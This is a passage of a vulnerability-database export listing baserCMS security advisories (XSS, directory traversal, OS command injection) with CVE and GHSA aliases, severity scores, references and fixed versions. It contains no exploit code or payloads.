vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-39325, GHSA-395x-wv32-44v5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz
20
url VCID-mfm9-gsh3-ubg8
vulnerability_id VCID-mfm9-gsh3-ubg8
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature
XSS vulnerability in the Blog posts feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
reference_id
reference_type
scores
0
value 0.01236
scoring_system epss
scoring_elements 0.79576
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
reference_id CVE-2024-46996
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
4
reference_url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46996, GHSA-66jv-qrm3-vvfg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8
21
url VCID-nxrf-64er-xbfx
vulnerability_id VCID-nxrf-64er-xbfx
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
reference_id
reference_type
scores
0
value 0.02281
scoring_system epss
scoring_elements 0.85006
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
reference_id CVE-2024-26128
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
5
reference_url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2024-26128, GHSA-jjxq-m8h3-4vw5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx
22
url VCID-p695-t9ye-v3ga
vulnerability_id VCID-p695-t9ye-v3ga
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature
XSS vulnerability in the Edit Email Form Settings feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
reference_id
reference_type
scores
0
value 0.01064
scoring_system epss
scoring_elements 0.7805
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_98693329
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://basercms.net/security/JVN_98693329
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
reference_id CVE-2024-46998
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
5
reference_url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46998, GHSA-p3m2-mj3j-j49x
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga
23
url VCID-pd8c-9d7z-zkhg
vulnerability_id VCID-pd8c-9d7z-zkhg
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
reference_id
reference_type
scores
0
value 0.00572
scoring_system epss
scoring_elements 0.69062
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
1
reference_url https://basercms.net/security/JVN_24381990
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://basercms.net/security/JVN_24381990
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
5
reference_url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43647, GHSA-ggj4-78rm-6xgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg
24
url VCID-sqr4-v889-tff8
vulnerability_id VCID-sqr4-v889-tff8
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature
XSS vulnerability in the Blog posts and Contents list feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
reference_id
reference_type
scores
0
value 0.01179
scoring_system epss
scoring_elements 0.79112
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
reference_id CVE-2024-46994
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
4
reference_url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46994, GHSA-wrjc-fmfq-w3jr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8
25
url VCID-u16w-rbuk-ybfs
vulnerability_id VCID-u16w-rbuk-ybfs
summary
baserCMS Directory Traversal vulnerability in Form submission data management Feature
There is a Directory Traversal vulnerability in the Form submission data management feature of baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.8 and earlier versions

### Vulnerability
There is a possibility that information on the server may be obtained by a user who is logged in to the management screen.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_45547161

### Credits
Shiga Takuma@BroadBand Security, Inc
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
reference_id
reference_type
scores
0
value 0.00289
scoring_system epss
scoring_elements 0.52624
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
1
reference_url https://basercms.net/security/JVN_81174674
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://basercms.net/security/JVN_81174674
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
5
reference_url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43648, GHSA-hmqj-gv2m-hq55
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs
26
url VCID-uedz-j2vn-cbea
vulnerability_id VCID-uedz-j2vn-cbea
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73646
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
1
reference_url https://basercms.net/security/JVN_09767360
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://basercms.net/security/JVN_09767360
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
